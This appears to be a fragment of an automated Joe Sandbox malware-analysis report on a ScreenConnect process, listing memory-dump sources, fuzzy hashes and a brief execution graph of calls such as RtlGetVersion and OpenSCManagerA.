                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1733864937.00000000016C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_16c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 1b0bd0352b8dab51192541492da5782e0301c712fe6130391f6554feada46ddb
                                                                                                                                                                                                                                                          • Instruction ID: 44f9785ef2adf1b4b80a2da6bb694f2135a6197e74269ad579cfa2f3c5ebfc86
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1b0bd0352b8dab51192541492da5782e0301c712fe6130391f6554feada46ddb
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C451AF30E003499FDB05DF78DD88B9DBBB1FF49310F10855AE414AB2A5DB79A989CB50
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1733864937.00000000016C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_16c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 1821d82d046f67e82749a00013d728e641255016b796fc2f291288172686a420
                                                                                                                                                                                                                                                          • Instruction ID: 37d1c2c6a8657526e57c4ebec21b269ae5211f5843e68385355dcdebd0cc1fe8
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1821d82d046f67e82749a00013d728e641255016b796fc2f291288172686a420
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EF418876A4E3C09FC71747749C244AA3FB0DE5766071F00EBD485CB2A3D6298C0ACB62
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1733864937.00000000016C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_16c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 3cdcff57655946f48228ea44efbb7e33af055b8f0d28b6dd9ad2d42ea2d605c3
                                                                                                                                                                                                                                                          • Instruction ID: f4f3bb047e68e12b164524ca2d6e2fc2972c5529ff1e64c02afb42d40b9ead6d
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3cdcff57655946f48228ea44efbb7e33af055b8f0d28b6dd9ad2d42ea2d605c3
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 85511D34600A01CFC734CF69D894A66BBF2FF8D724B145A6CD5969B7A8DB31E806CB44
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1733864937.00000000016C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_16c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: ef12239b44f21a7b79b549480491f8b4f7d42c947f22b3242d2c33f4a09c0d48
                                                                                                                                                                                                                                                          • Instruction ID: d4d9d01a0ce9d8d50fff02279c26716127732dd84a5879844b8ba1cc580c0b8c
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ef12239b44f21a7b79b549480491f8b4f7d42c947f22b3242d2c33f4a09c0d48
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2B514C746007058FCB34CF29D9446AABBF1FF48725B148A6DE056DB7A5DB30E84ACB90
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1733864937.00000000016C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_16c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 77537ad8f80d45b3a7e68ef21e91d909fa3af94420e7217ac40114e1b1a3f84c
                                                                                                                                                                                                                                                          • Instruction ID: 35c5d9f4b0eac76b31f5d28e6fe1b60a758d976d852cf1cebe872083ef15cd6d
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 77537ad8f80d45b3a7e68ef21e91d909fa3af94420e7217ac40114e1b1a3f84c
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 92415B306102119FCB18DB79DC58AAEBBF6FF88A10B14856DE40AE73A1DF719C05CB95
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1733864937.00000000016C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_16c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: f9b9e03dc33b8b9d437f4023badf8541b5f23b6ac9ce93b12e4949c0d6f24cce
                                                                                                                                                                                                                                                          • Instruction ID: c593f68d30cb3ce578d131fb5330d6322a052d9cb20803da75eb7bf3d564714d
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f9b9e03dc33b8b9d437f4023badf8541b5f23b6ac9ce93b12e4949c0d6f24cce
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 75415A746007058FDB34DF69D9486AABBF2FB48711B148A2CE056C77A5DB30E84ACB94
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1733864937.00000000016C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_16c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 2e7c4c86e28769fa63c0b4a3d48c362425ae32ab845e6a58a8c26f4c80327b31
                                                                                                                                                                                                                                                          • Instruction ID: ef0fd97c50d1d3eef814583f6e8a8cb903ba642120a366444750d3942351572c
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2e7c4c86e28769fa63c0b4a3d48c362425ae32ab845e6a58a8c26f4c80327b31
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 77412D746007058FDB74DF29D94866ABBF2FF48710B108A2CE456D77A5DB30E84ACBA4
Memory Dump Source
• Source File: 0000000B.00000002.1733864937.00000000016C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_16c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: f93e54d0d7ac05bef4d707fabcfafbe307d3815af46d34292aa51cc91d048011
                                                                                                                                                                                                                                                          • Instruction ID: d99adc57b6fc350825ab30cddb84f03f37aadc0fe05f0bd9ca5ae617672043e4
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f93e54d0d7ac05bef4d707fabcfafbe307d3815af46d34292aa51cc91d048011
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 02313A31B002058BDB249F69C8986BEFBF6FF89754F14946EE506E7354DB709C058B90
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1733864937.00000000016C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_16c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 99d006007b865e27a777dbcd28d42b3423a3eac02117aeecdb7307ef518554e2
                                                                                                                                                                                                                                                          • Instruction ID: 79c6b3634c502dd506bb36e0f299d55c77a42534730d471c2af7e37a5ada8fdc
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 99d006007b865e27a777dbcd28d42b3423a3eac02117aeecdb7307ef518554e2
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2D31DF71F042058FCB05DB6CC8546BEFBB6FF88210B1081AAD909DB386EB30AD06C791
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1733864937.00000000016C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_16c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 66048ae587196ecfdc0737f2c201d74132568d5eb77be22d58517daf45d92504
                                                                                                                                                                                                                                                          • Instruction ID: 201156c652f0a70dfe10d9a25f53276ce7d27fdfa14b05143802c06883f03e68
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 66048ae587196ecfdc0737f2c201d74132568d5eb77be22d58517daf45d92504
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4531F370600A018FC730DF29DC94A6ABBF2EF89721B144A2CD496DB7A5D730F906CB91
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1733864937.00000000016C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_16c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: dbdcae1d8f3d165c538ca3d4d59b8bd00e5db53dbbb4d99fcaeb3661524c3b3f
                                                                                                                                                                                                                                                          • Instruction ID: 63349b207e383f9b01081efdc709eafbd5a1cd08145115c5af6a56402c272d1b
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dbdcae1d8f3d165c538ca3d4d59b8bd00e5db53dbbb4d99fcaeb3661524c3b3f
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6C1127317006421BD725865CDE41A36BBE7DFC5A60B28C97DE469CB346EB21EC018791
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1733864937.00000000016C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_16c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 413e1f3f9b6599645447a5f651d41afcd21df3e338fbcc283472dd1373f21672
                                                                                                                                                                                                                                                          • Instruction ID: 75e8a2efb5e25d1a3b3339757662cd1d4fdae249307676921fac8f7768c98c68
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 413e1f3f9b6599645447a5f651d41afcd21df3e338fbcc283472dd1373f21672
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5D21C0307102015BD700EB78DD546AE7BA7FFCA210F408529E449AB398DF70AD09C7E5
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1733864937.00000000016C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_16c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 55a82b3a9c41f63059cec638a3d07c3e14e5ee673ee33448a9fee9ce6d5eb4fc
                                                                                                                                                                                                                                                          • Instruction ID: 4381b16df48ec7dd773df36101daf27e54d0800f12a3c31204b1e2d8e8c1a091
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 55a82b3a9c41f63059cec638a3d07c3e14e5ee673ee33448a9fee9ce6d5eb4fc
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 51112732B083525FD7068F28DC500AABFF5FB8AA50314466FD405CB352DB769C0A8BD8
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1733864937.00000000016C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_16c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 202a1b8978968a0deb0ebb53026aed83789c631321e9a5ca001d0e53c086ca74
                                                                                                                                                                                                                                                          • Instruction ID: 665836feb2a4b8dfc5ed01f34da034d798cc951391c2a338f3cfd4c7eb1da91c
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 202a1b8978968a0deb0ebb53026aed83789c631321e9a5ca001d0e53c086ca74
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7B213E302006059FC734DF29DC586AABBF1EF44720B109B2DD592976A5DB31E94ACF80
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1733864937.00000000016C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_16c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 0df6eb6da46d08ebd53da918c4066e8e745cdf2e672b527da85e007a6251f85c
                                                                                                                                                                                                                                                          • Instruction ID: 6d62ac1fdd9c7c37984944876d433c0ab815978c25fe71efd7dd3cc1dfde04dd
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0df6eb6da46d08ebd53da918c4066e8e745cdf2e672b527da85e007a6251f85c
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4C11D0317102065BD700EB68DD94BAEBBA7FBC8210F408529E509AB388DF70AD09C7E5
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1733864937.00000000016C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_16c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1733864937.00000000016C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_16c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1733554312.000000000166D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0166D000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_166d000_ScreenConnect.jbxd
Memory Dump Source
• Source File: 0000000B.00000002.1733554312.000000000166D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0166D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_166d000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1733864937.00000000016C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_16c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: c4feeb958ac58c7bc26e03764a19e75446f788d534420c5152dedee7905eb95e
                                                                                                                                                                                                                                                          • Instruction ID: 3593a9d092132fb6e0e492498d33d8711c82b57249354d683c5a3c9109b9e8fc
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c4feeb958ac58c7bc26e03764a19e75446f788d534420c5152dedee7905eb95e
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 98E02632B004135B8B08851C9C04130B7CACB8866473C8539F43ACB341FA21EC024B80
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1733864937.00000000016C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_16c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 88b29c9925185c9196df052cdfe4bf7203469f4b69ec8e2f3bc4513ace8b821a
                                                                                                                                                                                                                                                          • Instruction ID: 56f591c83f43f0e9eb5107aceb755b0711ca2784832899b1c10220342d160c5d
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 88b29c9925185c9196df052cdfe4bf7203469f4b69ec8e2f3bc4513ace8b821a
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E8E09AB1E51204AFCB84DF7889151AEBBF0EB5A214B1486AEC41DD6641E6369613CB81
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1733864937.00000000016C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_16c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: c3d8a7642696bc075187b1fb874f20e7cac827265e0f79d9eed6282b39748a89
                                                                                                                                                                                                                                                          • Instruction ID: da6566d4aa00d14faec94cfb69d5b8f4fc3318a5e0f8f95d67e7318984081817
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c3d8a7642696bc075187b1fb874f20e7cac827265e0f79d9eed6282b39748a89
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D6E08C3A7001155BC3586A7DFC1C86E7AEAEBC9631310412AF50AC33E4CF708C12CBA5
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1733864937.00000000016C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_16c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 4bde02de0cc06bcf2ebe78f1acf058baf6b84e565658090d3f58bf40a98d5e1d
                                                                                                                                                                                                                                                          • Instruction ID: 47fd3db261682e1aaca78ea4cfaebabe0bfec6ab9836bef59b84d5584a51cd71
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4bde02de0cc06bcf2ebe78f1acf058baf6b84e565658090d3f58bf40a98d5e1d
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 13D01730A0120EFF8B00DFB8EE0555EBBB9EB44201B1045A8D808D3304EA312E549B91
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1733864937.00000000016C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_16c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: c7eab70127784187043acf4e01da094988217cc1403793351b6f1a1fa28653a8
                                                                                                                                                                                                                                                          • Instruction ID: dc59c02d142ee9da709414ceed45cc32e3011a8344443f009fb1986bb26aad1d
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c7eab70127784187043acf4e01da094988217cc1403793351b6f1a1fa28653a8
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9ED0127090110DEF9B40DFB4ED4565EB7B9EB45200B1041A9E808D3250EA315E049B50

                                                                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                                                                          Execution Coverage:10.8%
                                                                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                                          Signature Coverage:31.2%
                                                                                                                                                                                                                                                          Total number of Nodes:16
                                                                                                                                                                                                                                                          Total number of Limit Nodes:1
                                                                                                                                                                                                                                                          execution_graph 16244 8836b0 16245 8836c6 16244->16245 16248 884c71 16245->16248 16246 8836cc 16249 884c90 16248->16249 16250 884d1d RtlGetVersion 16249->16250 16252 884cc6 16249->16252 16251 884dda 16250->16251 16251->16246 16252->16246 16253 54d1230 16256 54d1358 16253->16256 16260 54d13dc 16256->16260 16264 54d13e8 16256->16264 16261 54d1443 OpenSCManagerA 16260->16261 16263 54d152b 16261->16263 16265 54d1443 OpenSCManagerA 16264->16265 16267 54d152b 16265->16267

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                          control_flow_graph 0 884c71-884cb3 5 884d02-884d08 0->5 6 884cb5-884cc4 call 884830 0->6 9 884d09-884dd8 RtlGetVersion 6->9 10 884cc6-884ccb 6->10 15 884dda-884de0 9->15 16 884de1-884e24 9->16 22 884cce call 884ee8 10->22 23 884cce call 884ef8 10->23 12 884cd4 12->5 15->16 20 884e2b-884e32 16->20 21 884e26 16->21 21->20 22->12 23->12
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • RtlGetVersion.NTDLL(0000009C), ref: 00884DBE
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1790495871.0000000000880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00880000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_880000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Version
                                                                                                                                                                                                                                                          • String ID: `Q_q$`Q_q
                                                                                                                                                                                                                                                          • API String ID: 1889659487-1312627481

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                          control_flow_graph 171 54d13dc-54d1441 172 54d147a-54d1498 171->172 173 54d1443-54d144d 171->173 178 54d149a-54d14a4 172->178 179 54d14d1-54d1529 OpenSCManagerA 172->179 173->172 174 54d144f-54d1451 173->174 176 54d1474-54d1477 174->176 177 54d1453-54d145d 174->177 176->172 180 54d145f 177->180 181 54d1461-54d1470 177->181 178->179 183 54d14a6-54d14a8 178->183 189 54d152b-54d1531 179->189 190 54d1532-54d156a 179->190 180->181 181->181 182 54d1472 181->182 182->176 184 54d14cb-54d14ce 183->184 185 54d14aa-54d14b4 183->185 184->179 187 54d14b8-54d14c7 185->187 188 54d14b6 185->188 187->187 191 54d14c9 187->191 188->187 189->190 195 54d156c-54d1570 190->195 196 54d157a-54d157e 190->196 191->184 195->196 197 54d1572 195->197 198 54d158e 196->198 199 54d1580-54d1584 196->199 197->196 201 54d158f 198->201 199->198 200 54d1586 199->200 200->198 201->201
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • OpenSCManagerA.SECHOST(?,?,?), ref: 054D1513
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1801216537.00000000054D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054D0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_54d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ManagerOpen
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 1889721586-0
                                                                                                                                                                                                                                                          • Opcode ID: 79753af486148c489218b8ce895bfdfea9edfd782d8e289c3be22f0a2c6bd6f7
                                                                                                                                                                                                                                                          • Instruction ID: 2d10ccf68d026322d0e5a325b5f014da24a148b38a9f7483d88af9e9f6db13d7
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 79753af486148c489218b8ce895bfdfea9edfd782d8e289c3be22f0a2c6bd6f7
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 495125B1D006599FDB14CFA8C9A57EEFBB1BB08310F14852AEC56E7380D7749881CB91

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • OpenSCManagerA.SECHOST(?,?,?), ref: 054D1513
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1801216537.00000000054D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054D0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_54d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ManagerOpen
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 1889721586-0
                                                                                                                                                                                                                                                          • Opcode ID: 1e7236f41b666cd9d5490065226a46ff8d8c9548fd6453593cc2659e4c88f259
                                                                                                                                                                                                                                                          • Instruction ID: 615d13adb7e8a5c454e8fa080fb7227a45536d8ce3a648075e9d4dddfad259bb
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1e7236f41b666cd9d5490065226a46ff8d8c9548fd6453593cc2659e4c88f259
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EC5116B1D002599FDB14DFA8C9A57EEFBB1FB08314F14816AEC56A7340D7749881CBA1
